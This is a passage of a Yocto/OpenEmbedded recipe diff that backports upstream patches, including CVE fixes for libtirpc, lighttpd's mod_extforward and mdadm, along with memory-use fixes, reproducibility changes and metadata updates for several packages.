++ if (timeout == 0 && least_active != NULL) {
++ __xprt_unregister_unlocked(least_active);
++ __svc_vc_dodestroy(least_active);
++ ncleaned++;
++ }
++ rwlock_unlock(&svc_fd_lock);
++ return (ncleaned);
++}
+--
+2.25.1
+
diff --git a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
index 10a324c3b6..80151ff83a 100644
--- a/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
+++ b/meta/recipes-extended/libtirpc/libtirpc_1.2.6.bb
@@ -9,7 +9,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=f835cce8852481e4b2bbbdd23b5e47f3 \
PROVIDES = "virtual/librpc"
-SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2"
+SRC_URI = "${SOURCEFORGE_MIRROR}/${BPN}/${BP}.tar.bz2 \
+ file://CVE-2021-46828.patch \
+ "
UPSTREAM_CHECK_URI = "https://sourceforge.net/projects/libtirpc/files/libtirpc/"
UPSTREAM_CHECK_REGEX = "(?P<pver>\d+(\.\d+)+)/"
SRC_URI[md5sum] = "b25f9cc18bfad50f7c446c77f4ae00bb"
@@ -20,7 +22,7 @@ inherit autotools pkgconfig
EXTRA_OECONF = "--disable-gssapi"
do_install_append() {
- chown root:root ${D}${sysconfdir}/netconfig
+ test -e ${D}${sysconfdir}/netconfig && chown root:root ${D}${sysconfdir}/netconfig
}
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
index f17bdce2c0..44b9136b05 100644
--- a/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch
@@ -1,4 +1,4 @@
-From 22afc5d9aaa215c3c87ba21c77d47da44ab3b113 Mon Sep 17 00:00:00 2001
+From f918d5ba6ff1d439822be063237aea2705ea27b8 Mon Sep 17 00:00:00 2001
From: Alexander Kanavin <alex.kanavin@gmail.com>
Date: Fri, 26 Aug 2016 18:20:32 +0300
Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
@@ -6,15 +6,16 @@ Subject: [PATCH] Use pkg-config for pcre dependency instead of -config script.
RP 2014/5/22
Upstream-Status: Pending
Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+
---
configure.ac | 16 ++++++++++++----
1 file changed, 12 insertions(+), 4 deletions(-)
diff --git a/configure.ac b/configure.ac
-index 5383cec..c29a902 100644
+index dbddfb9..62cf17f 100644
--- a/configure.ac
+++ b/configure.ac
-@@ -651,10 +651,18 @@ AC_ARG_WITH([pcre],
+@@ -748,10 +748,18 @@ AC_ARG_WITH([pcre],
)
AC_MSG_RESULT([$WITH_PCRE])
@@ -37,6 +38,3 @@ index 5383cec..c29a902 100644
else
AC_PATH_PROG([PCRECONFIG], [pcre-config])
if test -n "$PCRECONFIG"; then
---
-2.15.0
-
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
new file mode 100644
index 0000000000..e226366112
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch
@@ -0,0 +1,224 @@
+From a566fe4cc9f9d0ef9cfdcbc13159ef0644e91c9c Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Wed, 23 Dec 2020 23:14:47 -0500
+Subject: [PATCH] reuse large mem chunks (fix mem usage) (fixes #3033)
+
+(cherry picked from commit 7ba521ffb4959f6f74a609d5d4acafc29a038337)
+
+(thx flynn)
+
+fix large memory usage for large file downloads from dynamic backends
+
+reuse or release large memory chunks
+
+x-ref:
+ "Memory Growth with PUT and full buffered streams"
+ https://redmine.lighttpd.net/issues/3033
+
+Upstream-Status: Backport
+Comment: Hunk refreshed to make it backword compatible.
+https://redmine.lighttpd.net/projects/lighttpd/repository/14/revisions/7ba521ffb4959f6f74a609d5d4acafc29a038337
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+
+---
+ src/chunk.c | 99 +++++++++++++++++++++++++++++++++---------
+ src/chunk.h | 2 +
+ src/http-header-glue.c | 2 +-
+ 3 files changed, 82 insertions(+), 21 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 133308f..d7259b9 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -28,16 +28,20 @@
+ static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
++static int chunks_oversized_n;
+ static array *chunkqueue_default_tempdirs = NULL;
+ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
++ size_t x = 1024;
++ while (x < sz && x < (1u << 30)) x <<= 1;
++ chunk_buf_sz = sz > 0 ? x : 8192;
+ }
+
+ void chunkqueue_set_tempdirs_default_reset (void)
+ {
++ chunk_buf_sz = 8192;
+ chunkqueue_default_tempdirs = NULL;
+ chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+ }
+@@ -120,15 +124,49 @@ static void chunk_free(chunk *c) {
+ free(c);
+ }
+
+-buffer * chunk_buffer_acquire(void) {
++static chunk * chunk_pop_oversized(size_t sz) {
++ /* future: might have buckets of certain sizes, up to socket buf sizes */
++ if (chunks_oversized && chunks_oversized->mem->size >= sz) {
++ --chunks_oversized_n;
++ chunk *c = chunks_oversized;
++ chunks_oversized = c->next;
++ return c;
++ }
++ return NULL;
++}
++
++static void chunk_push_oversized(chunk * const c, const size_t sz) {
++ if (chunks_oversized_n < 64 && chunk_buf_sz >= 4096) {
++ ++chunks_oversized_n;
++ chunk **co = &chunks_oversized;
++ while (*co && sz < (*co)->mem->size) co = &(*co)->next;
++ c->next = *co;
++ *co = c;
++ }
++ else
++ chunk_free(c);
++}
++
++static buffer * chunk_buffer_acquire_sz(size_t sz) {
+ chunk *c;
+ buffer *b;
+- if (chunks) {
+- c = chunks;
+- chunks = c->next;
++ if (sz <= chunk_buf_sz) {
++ if (chunks) {
++ c = chunks;
++ chunks = c->next;
++ }
++ else
++ c = chunk_init(chunk_buf_sz);
++ /* future: might choose to pop from chunks_oversized, if available
++ * (even if larger than sz) rather than allocating new chunk
++ * (and if doing so, might replace chunks_oversized_n) */
+ }
+ else {
+- c = chunk_init(chunk_buf_sz);
++ /*(round up to nearest chunk_buf_sz)*/
++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++ c = chunk_pop_oversized(sz);
++ if (NULL == c)
++ c = chunk_init(sz);
+ }
+ c->next = chunk_buffers;
+ chunk_buffers = c;
+@@ -137,21 +175,47 @@ buffer * chunk_buffer_acquire(void) {
+ return b;
+ }
+
++buffer * chunk_buffer_acquire(void) {
++ return chunk_buffer_acquire_sz(chunk_buf_sz);
++}
++
+ void chunk_buffer_release(buffer *b) {
+ if (NULL == b) return;
+- if (b->size >= chunk_buf_sz && chunk_buffers) {
++ if (chunk_buffers) {
+ chunk *c = chunk_buffers;
+ chunk_buffers = c->next;
+ c->mem = b;
+- c->next = chunks;
+- chunks = c;
+ buffer_clear(b);
++ if (b->size == chunk_buf_sz) {
++ c->next = chunks;
++ chunks = c;
++ }
++ else if (b->size > chunk_buf_sz)
++ chunk_push_oversized(c, b->size);
++ else
++ chunk_free(c);
+ }
+ else {
+ buffer_free(b);
+ }
+ }
+
++size_t chunk_buffer_prepare_append(buffer * const b, size_t sz) {
++ if (sz > chunk_buffer_string_space(b)) {
++ sz += b->used ? b->used : 1;
++ buffer * const cb = chunk_buffer_acquire_sz(sz);
++ /* swap buffer contents and copy original b->ptr into larger b->ptr */
++ /*(this does more than buffer_move())*/
++ buffer tb = *b;
++ *b = *cb;
++ *cb = tb;
++ if ((b->used = tb.used))
++ memcpy(b->ptr, tb.ptr, tb.used);
++ chunk_buffer_release(cb);
++ }
++ return chunk_buffer_string_space(b);
++}
++
+ static chunk * chunk_acquire(size_t sz) {
+ if (sz <= chunk_buf_sz) {
+ if (chunks) {
+@@ -162,13 +226,10 @@ static chunk * chunk_acquire(size_t sz) {
+ sz = chunk_buf_sz;
+ }
+ else {
+- sz = (sz + 8191) & ~8191uL;
+- /* future: might have buckets of certain sizes, up to socket buf sizes*/
+- if (chunks_oversized && chunks_oversized->mem->size >= sz) {
+- chunk *c = chunks_oversized;
+- chunks_oversized = c->next;
+- return c;
+- }
++ /*(round up to nearest chunk_buf_sz)*/
++ sz = (sz + (chunk_buf_sz-1)) & ~(chunk_buf_sz-1);
++ chunk *c = chunk_pop_oversized(sz);
++ if (c) return c;
+ }
+
+ return chunk_init(sz);
+@@ -183,10 +244,7 @@ static void chunk_release(chunk *c) {
+ }
+ else if (sz > chunk_buf_sz) {
+ chunk_reset(c);
+- chunk **co = &chunks_oversized;
+- while (*co && sz < (*co)->mem->size) co = &(*co)->next;
+- c->next = *co;
+- *co = c;
++ chunk_push_oversized(c, sz);
+ }
+ else {
+ chunk_free(c);
+@@ -205,6 +263,7 @@ void chunkqueue_chunk_pool_clear(void)
+ chunk_free(c);
+ }
+ chunks_oversized = NULL;
++ chunks_oversized_n = 0;
+ }
+
+ void chunkqueue_chunk_pool_free(void)
+diff --git a/src/chunk.h b/src/chunk.h
+index 4c6b7e4..93f343c 100644
+--- a/src/chunk.h
++++ b/src/chunk.h
+@@ -50,6 +50,8 @@ typedef struct {
+ buffer * chunk_buffer_acquire(void);
+ void chunk_buffer_release(buffer *b);
+
++size_t chunk_buffer_prepare_append (buffer *b, size_t sz);
++
+ void chunkqueue_chunk_pool_clear(void);
+ void chunkqueue_chunk_pool_free(void);
+
+diff --git a/src/http-header-glue.c b/src/http-header-glue.c
+index d54f00c..2231fba 100644
+--- a/src/http-header-glue.c
++++ b/src/http-header-glue.c
+@@ -1267,7 +1267,7 @@ handler_t http_response_read(server *srv, connection *con, http_response_opts *o
+ if (avail < toread) {
+ /*(add avail+toread to reduce allocations when ioctl EOPNOTSUPP)*/
+ avail = avail ? avail - 1 + toread : toread;
+- buffer_string_prepare_append(b, avail);
++ avail = chunk_buffer_prepare_append(b, avail);
+ }
+
+ n = read(fd, b->ptr+buffer_string_length(b), avail);
diff --git a/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
new file mode 100644
index 0000000000..da59b7297a
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch
@@ -0,0 +1,100 @@
+From 27103f3f8b1a2857aa45b889e775435f7daf141f Mon Sep 17 00:00:00 2001
+From: povcfe <povcfe@qq.com>
+Date: Wed, 5 Jan 2022 11:11:09 +0000
+Subject: [PATCH] [mod_extforward] fix out-of-bounds (OOB) write (fixes #3134)
+
+(thx povcfe)
+
+(edited: gstrauss)
+
+There is a potential remote denial of service in lighttpd mod_extforward
+under specific, non-default and uncommon 32-bit lighttpd mod_extforward
+configurations.
+
+Under specific, non-default and uncommon lighttpd mod_extforward
+configurations, a remote attacker can trigger a 4-byte out-of-bounds
+write of value '-1' to the stack. This is not believed to be exploitable
+in any way beyond triggering a crash of the lighttpd server on systems
+where the lighttpd server has been built 32-bit and with compiler flags
+which enable a stack canary -- gcc/clang -fstack-protector-strong or
+-fstack-protector-all, but bug not visible with only -fstack-protector.
+
+With standard lighttpd builds using -O2 optimization on 64-bit x86_64,
+this bug has not been observed to cause adverse behavior, even with
+gcc/clang -fstack-protector-strong.
+
+For the bug to be reachable, the user must be using a non-default
+lighttpd configuration which enables mod_extforward and configures
+mod_extforward to accept and parse the "Forwarded" header from a trusted
+proxy. At this time, support for RFC7239 Forwarded is not common in CDN
+providers or popular web server reverse proxies. It bears repeating that
+for the user to desire to configure lighttpd mod_extforward to accept
+"Forwarded", the user must also be using a trusted proxy (in front of
+lighttpd) which understands and actively modifies the "Forwarded" header
+sent to lighttpd.
+
+lighttpd natively supports RFC7239 "Forwarded"
+hiawatha natively supports RFC7239 "Forwarded"
+
+nginx can be manually configured to add a "Forwarded" header
+https://www.nginx.com/resources/wiki/start/topics/examples/forwarded/
+
+A 64-bit build of lighttpd on x86_64 (not known to be affected by bug)
+in front of another 32-bit lighttpd will detect and reject a malicious
+"Forwarded" request header, thereby thwarting an attempt to trigger
+this bug in an upstream 32-bit lighttpd.
+
+The following servers currently do not natively support RFC7239 Forwarded:
+nginx
+apache2
+caddy
+node.js
+haproxy
+squid
+varnish-cache
+litespeed
+
+Given the general dearth of support for RFC7239 Forwarded in popular
+CDNs and web server reverse proxies, and given the prerequisites in
+lighttpd mod_extforward needed to reach this bug, the number of lighttpd
+servers vulnerable to this bug is estimated to be vanishingly small.
+Large systems using reverse proxies are likely running 64-bit lighttpd,
+which is not known to be adversely affected by this bug.
+
+In the future, it is desirable for more servers to implement RFC7239
+Forwarded. lighttpd developers would like to thank povcfe for reporting
+this bug so that it can be fixed before more CDNs and web servers
+implement RFC7239 Forwarded.
+
+x-ref:
+ "mod_extforward plugin has out-of-bounds (OOB) write of 4-byte -1"
+ https://redmine.lighttpd.net/issues/3134
+ (not yet written or published)
+ CVE-2022-22707
+
+Upstream-Status: Backport
+CVE: CVE-2022-22707
+Signed-off-by: Ross Burton <ross.burton@arm.com>
+
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ src/mod_extforward.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/mod_extforward.c b/src/mod_extforward.c
+index ba957e04..fdaef7f6 100644
+--- a/src/mod_extforward.c
++++ b/src/mod_extforward.c
+@@ -715,7 +715,7 @@ static handler_t mod_extforward_Forwarded (request_st * const r, plugin_data * c
+ while (s[i] == ' ' || s[i] == '\t') ++i;
+ if (s[i] == ';') { ++i; continue; }
+ if (s[i] == ',') {
+- if (j >= (int)(sizeof(offsets)/sizeof(int))) break;
++ if (j >= (int)(sizeof(offsets)/sizeof(int))-1) break;
+ offsets[++j] = -1; /*("offset" separating params from next proxy)*/
+ ++i;
+ continue;
+--
+2.25.1
+
diff --git a/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
new file mode 100644
index 0000000000..fd75ca6e26
--- /dev/null
+++ b/meta/recipes-extended/lighttpd/lighttpd/default-chunk-size-8k.patch
@@ -0,0 +1,35 @@
+From 2e08ee1d404e308f15551277e92b7605ddfa96a8 Mon Sep 17 00:00:00 2001
+From: Glenn Strauss <gstrauss@gluelogic.com>
+Date: Fri, 29 Nov 2019 18:18:52 -0500
+Subject: [PATCH] default chunk size 8k (was 4k)
+
+Upstream-Status: Backport
+Comment: No hunk refreshed
+https://git.lighttpd.net/lighttpd/lighttpd1.4/commit/304e46d4f808c46cbb025edfacf2913a30ce8855
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/chunk.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/src/chunk.c b/src/chunk.c
+index 09dd3f1..133308f 100644
+--- a/src/chunk.c
++++ b/src/chunk.c
+@@ -25,7 +25,7 @@
+ #define DEFAULT_TEMPFILE_SIZE (1 * 1024 * 1024)
+ #define MAX_TEMPFILE_SIZE (128 * 1024 * 1024)
+
+-static size_t chunk_buf_sz = 4096;
++static size_t chunk_buf_sz = 8192;
+ static chunk *chunks, *chunks_oversized;
+ static chunk *chunk_buffers;
+ static array *chunkqueue_default_tempdirs = NULL;
+@@ -33,7 +33,7 @@ static off_t chunkqueue_default_tempfile_size = DEFAULT_TEMPFILE_SIZE;
+
+ void chunkqueue_set_chunk_size (size_t sz)
+ {
+- chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 4096;
++ chunk_buf_sz = sz > 0 ? ((sz + 1023) & ~1023uL) : 8192;
+ }
+
+ void chunkqueue_set_tempdirs_default_reset (void)
diff --git a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
index 7a255ce2f2..357a269015 100644
--- a/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
+++ b/meta/recipes-extended/lighttpd/lighttpd_1.4.55.bb
@@ -1,5 +1,6 @@
SUMMARY = "Lightweight high-performance web server"
HOMEPAGE = "http://www.lighttpd.net/"
+DESCRIPTION = "Lightweight high-performance web server is designed and optimized for high performance environments. With a small memory footprint compared to other web-servers, effective management of the cpu-load, and advanced feature set (FastCGI, SCGI, Auth, Output-Compression, URL-Rewriting and many more)"
BUGTRACKER = "http://redmine.lighttpd.net/projects/lighttpd/issues"
LICENSE = "BSD-3-Clause"
@@ -13,10 +14,13 @@ RRECOMMENDS_${PN} = "lighttpd-module-access \
lighttpd-module-accesslog"
SRC_URI = "http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-${PV}.tar.xz \
+ file://0001-mod_extforward-fix-out-of-bounds-OOB-write-fixes-313.patch \
file://index.html.lighttpd \
file://lighttpd.conf \
file://lighttpd \
file://0001-Use-pkg-config-for-pcre-dependency-instead-of-config.patch \
+ file://default-chunk-size-8k.patch \
+ file://0001-core-reuse-large-mem-chunks-fix-mem-usage-fixes-3033.patch \
"
SRC_URI[md5sum] = "be4bda2c28bcbdac6eb941528f6edf03"
diff --git a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
index 17f4bf4617..7c1b77add8 100644
--- a/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
+++ b/meta/recipes-extended/logrotate/logrotate_3.15.1.bb
@@ -1,6 +1,7 @@
SUMMARY = "Rotates, compresses, removes and mails system log files"
SECTION = "console/utils"
-HOMEPAGE = "https://github.com/logrotate/logrotate/issues"
+HOMEPAGE = "https://github.com/logrotate/logrotate/"
+DESCRIPTION = "The logrotate utility is designed to simplify the administration of log files on a system which generates a lot of log files."
LICENSE = "GPLv2"
# TODO: Document coreutils dependency. Why not RDEPENDS? Why not busybox?
@@ -21,6 +22,9 @@ SRC_URI = "https://github.com/${BPN}/${BPN}/releases/download/${PV}/${BP}.tar.xz
SRC_URI[md5sum] = "afe109afea749c306ff489203fde6beb"
SRC_URI[sha256sum] = "491fec9e89f1372f02a0ab66579aa2e9d63cac5178dfa672c204c88e693a908b"
+# These CVEs are debian, gentoo or SUSE specific on the way logrotate was installed/used
+CVE_CHECK_WHITELIST += "CVE-2011-1548 CVE-2011-1549 CVE-2011-1550"
+
PACKAGECONFIG ?= "${@bb.utils.filter('DISTRO_FEATURES', 'acl selinux', d)}"
PACKAGECONFIG[acl] = ",,acl"
diff --git a/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
new file mode 100644
index 0000000000..f32cd18370
--- /dev/null
+++ b/meta/recipes-extended/lsb/lsb-release/help2man-reproducibility.patch
@@ -0,0 +1,27 @@
+lsb-release maintains it's own copy of help2man. Include the support
+for specifying SOURCE_DATE_EPOCH from upstream.
+
+Upstream-Status: Pending
+
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+
+diff --git a/help2man b/help2man
+index 13015c2..63439db 100755
+--- a/help2man
++++ b/help2man
+@@ -173,7 +173,14 @@ my ($help_text, $version_text) = map {
+ or die "$this_program: can't get `--$_' info from $ARGV[0]\n"
+ } qw(help), $opt_version_key;
+
+-my $date = strftime "%B %Y", localtime;
++my $epoch_secs = time;
++if (exists $ENV{SOURCE_DATE_EPOCH} and $ENV{SOURCE_DATE_EPOCH} =~ /^(\d+)$/)
++{
++ $epoch_secs = $1;
++ $ENV{TZ} = 'UTC0';
++}
++
++my $date = strftime "%B %Y", localtime $epoch_secs;
+ (my $program = $ARGV[0]) =~ s!.*/!!;
+ my $package = $program;
+ my $version;
diff --git a/meta/recipes-extended/lsb/lsb-release_1.4.bb b/meta/recipes-extended/lsb/lsb-release_1.4.bb
index 3e8f7a13ec..bafc18fcc0 100644
--- a/meta/recipes-extended/lsb/lsb-release_1.4.bb
+++ b/meta/recipes-extended/lsb/lsb-release_1.4.bb
@@ -11,6 +11,7 @@ LIC_FILES_CHKSUM = "file://README;md5=12da544b1a3a5a1795a21160b49471cf"
SRC_URI = "${SOURCEFORGE_MIRROR}/project/lsb/lsb_release/1.4/lsb-release-1.4.tar.gz \
file://0001-fix-lsb_release-to-work-with-busybox-head-and-find.patch \
file://0001-Remove-timestamp-from-manpage.patch \
+ file://help2man-reproducibility.patch \
"
SRC_URI[md5sum] = "30537ef5a01e0ca94b7b8eb6a36bb1e4"
diff --git a/meta/recipes-extended/lsof/lsof_4.91.bb b/meta/recipes-extended/lsof/lsof_4.91.bb
index b3adfd57af..7c85bf23fc 100644
--- a/meta/recipes-extended/lsof/lsof_4.91.bb
+++ b/meta/recipes-extended/lsof/lsof_4.91.bb
@@ -3,7 +3,7 @@ DESCRIPTION = "Lsof is a Unix-specific diagnostic tool. \
Its name stands for LiSt Open Files, and it does just that."
HOMEPAGE = "http://people.freebsd.org/~abe/"
SECTION = "devel"
-LICENSE = "BSD"
+LICENSE = "Spencer-94"
LIC_FILES_CHKSUM = "file://00README;beginline=645;endline=679;md5=964df275d26429ba3b39dbb9f205172a"
# Upstream lsof releases are hosted on an ftp server which times out download
diff --git a/meta/recipes-extended/ltp/ltp_20200120.bb b/meta/recipes-extended/ltp/ltp_20200120.bb
index 6633755a20..505b7b14fc 100644
--- a/meta/recipes-extended/ltp/ltp_20200120.bb
+++ b/meta/recipes-extended/ltp/ltp_20200120.bb
@@ -29,7 +29,7 @@ CFLAGS_append_powerpc64 = " -D__SANE_USERSPACE_TYPES__"
CFLAGS_append_mipsarchn64 = " -D__SANE_USERSPACE_TYPES__"
SRCREV = "4079aaf264d0e9ead042b59d1c5f4e643620d0d5"
-SRC_URI = "git://github.com/linux-test-project/ltp.git \
+SRC_URI = "git://github.com/linux-test-project/ltp.git;branch=master;protocol=https \
file://0001-build-Add-option-to-select-libc-implementation.patch \
file://0003-Check-if-__GLIBC_PREREQ-is-defined-before-using-it.patch \
file://0004-guard-mallocopt-with-__GLIBC__.patch \
diff --git a/meta/recipes-extended/lzip/lzip_1.21.bb b/meta/recipes-extended/lzip/lzip_1.21.bb
index bb3d2a6fe3..bd1c007de6 100644
--- a/meta/recipes-extended/lzip/lzip_1.21.bb
+++ b/meta/recipes-extended/lzip/lzip_1.21.bb
@@ -1,5 +1,6 @@
SUMMARY = "Lossless data compressor based on the LZMA algorithm"
HOMEPAGE = "http://lzip.nongnu.org/lzip.html"
+DESCRIPTION = "Lzip is a lossless data compressor with a user interface similar to the one of gzip or bzip2. Lzip uses a simplified form of the Lempel-Ziv-Markov chain-Algorithm (LZMA) stream format, chosen to maximize safety and interoperability."
SECTION = "console/utils"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=76d6e300ffd8fb9d18bd9b136a9bba13 \
diff --git a/meta/recipes-extended/man-db/man-db_2.9.0.bb b/meta/recipes-extended/man-db/man-db_2.9.0.bb
index 5b017e8023..7a30f9d722 100644
--- a/meta/recipes-extended/man-db/man-db_2.9.0.bb
+++ b/meta/recipes-extended/man-db/man-db_2.9.0.bb
@@ -1,5 +1,6 @@
SUMMARY = "An implementation of the standard Unix documentation system accessed using the man command"
HOMEPAGE = "http://man-db.nongnu.org/"
+DESCRIPTION = "man-db is an implementation of the standard Unix documentation system accessed using the man command. It uses a Berkeley DB database in place of the traditional flat-text whatis databases."
LICENSE = "LGPLv2.1 & GPLv2"
LIC_FILES_CHKSUM = "file://docs/COPYING.LIB;md5=a6f89e2100d9b6cdffcea4f398e37343 \
file://docs/COPYING;md5=eb723b61539feef013de476e68b5c50a"
@@ -12,6 +13,7 @@ SRC_URI[sha256sum] = "5d4aacd9e8876d6a3203a889860c3524c293c38f04111a3350deab8a6c
DEPENDS = "libpipeline gdbm groff-native base-passwd"
RDEPENDS_${PN} += "base-passwd"
+PACKAGE_WRITE_DEPS += "base-passwd"
# | /usr/src/debug/man-db/2.8.0-r0/man-db-2.8.0/src/whatis.c:939: undefined reference to `_nl_msg_cat_cntr'
USE_NLS_libc-musl = "no"
@@ -21,6 +23,11 @@ inherit gettext pkgconfig autotools systemd
EXTRA_OECONF = "--with-pager=less --with-systemdsystemunitdir=${systemd_unitdir}/system"
EXTRA_AUTORECONF += "-I ${S}/gl/m4"
+# Can be dropped when the output next changes, avoids failures after
+# reproducibility issues
+PR = "r1"
+HASHEQUIV_HASH_VERSION .= ".1"
+
do_install() {
autotools_do_install
diff --git a/meta/recipes-extended/mc/mc_4.8.23.bb b/meta/recipes-extended/mc/mc_4.8.23.bb
index ead348b92e..8e3b7a65e0 100644
--- a/meta/recipes-extended/mc/mc_4.8.23.bb
+++ b/meta/recipes-extended/mc/mc_4.8.23.bb
@@ -1,5 +1,6 @@
SUMMARY = "Midnight Commander is an ncurses based file manager"
HOMEPAGE = "http://www.midnight-commander.org/"
+DESCRIPTION = "GNU Midnight Commander is a visual file manager, licensed under GNU General Public License and therefore qualifies as Free Software. It's a feature rich full-screen text mode application that allows you to copy, move and delete files and whole directory trees, search for files and run commands in the subshell. Internal viewer and editor are included."
LICENSE = "GPLv3"
LIC_FILES_CHKSUM = "file://COPYING;md5=270bbafe360e73f9840bd7981621f9c2"
SECTION = "console/utils"
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
new file mode 100644
index 0000000000..8e0a06cbc7
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28736.patch
@@ -0,0 +1,77 @@
+From ced5fa8b170ad448f4076e24a10c731b5cfb36ce Mon Sep 17 00:00:00 2001
+From: Blazej Kucman <blazej.kucman@intel.com>
+Date: Fri, 3 Dec 2021 15:31:15 +0100
+Subject: mdadm: block creation with long names
+
+This fixes buffer overflows in create_mddev(). It prohibits
+creation with not supported names for DDF and native. For IMSM,
+mdadm will do silent cut to 16 later.
+
+Signed-off-by: Mariusz Tkaczyk <mariusz.tkaczyk@linux.intel.com>
+Signed-off-by: Blazej Kucman <blazej.kucman@intel.com>
+Signed-off-by: Jes Sorensen <jsorensen@fb.com>
+---
+
+Upstream-Status: Backport from [https://git.kernel.org/pub/scm/utils/mdadm/mdadm.git/patch/?id=ced5fa8b170ad448f4076e24a10c731b5cfb36ce]
+CVE: CVE-2023-28736
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ mdadm.8.in | 5 +++++
+ mdadm.c | 9 ++++++++-
+ mdadm.h | 5 +++++
+ 3 files changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/mdadm.8.in b/mdadm.8.in
+index 28d773c2..68e100cb 100644
+--- a/mdadm.8.in
++++ b/mdadm.8.in
+@@ -2186,6 +2186,11 @@ is run, but will be created by
+ .I udev
+ once the array becomes active.
+
++The max length md-device name is limited to 32 characters.
++Different metadata types have more strict limitation
++(like IMSM where only 16 characters are allowed).
++For that reason, long name could be truncated or rejected, it depends on metadata policy.
++
+ As devices are added, they are checked to see if they contain RAID
+ superblocks or filesystems. They are also checked to see if the variance in
+ device size exceeds 1%.
+diff --git a/mdadm.c b/mdadm.c
+index 91e67467..26299b2e 100644
+--- a/mdadm.c
++++ b/mdadm.c
+@@ -1359,9 +1359,16 @@ int main(int argc, char *argv[])
+ mdfd = open_mddev(devlist->devname, 1);
+ if (mdfd < 0)
+ exit(1);
+- } else
++ } else {
++ char *bname = basename(devlist->devname);
++
++ if (strlen(bname) > MD_NAME_MAX) {
++ pr_err("Name %s is too long.\n", devlist->devname);
++ exit(1);
++ }
+ /* non-existent device is OK */
+ mdfd = open_mddev(devlist->devname, 0);
++ }
+ if (mdfd == -2) {
+ pr_err("device %s exists but is not an md array.\n", devlist->devname);
+ exit(1);
+diff --git a/mdadm.h b/mdadm.h
+index 54567396..c7268a71 100644
+--- a/mdadm.h
++++ b/mdadm.h
+@@ -1880,3 +1880,8 @@ enum r0layout {
+ #define INVALID_SECTORS 1
+ /* And another special number needed for --data_offset=variable */
+ #define VARIABLE_OFFSET 3
++
++/**
++ * This is true for native and DDF, IMSM allows 16.
++ */
++#define MD_NAME_MAX 32
+--
+cgit
+
diff --git a/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
new file mode 100644
index 0000000000..1e2990d79a
--- /dev/null
+++ b/meta/recipes-extended/mdadm/files/CVE-2023-28938.patch
@@ -0,0 +1,80 @@
+From 7d374a1869d3a84971d027a7f4233878c8f25a62 Mon Sep 17 00:00:00 2001
+From: Mateusz Grzonka <mateusz.grzonka@intel.com>
+Date: Tue, 27 Jul 2021 10:25:18 +0200
+Subject: Fix memory leak after "mdadm --detail"
+
+Signed-off-by: Mateusz Grzonka <mateusz.grzonka@intel.com>
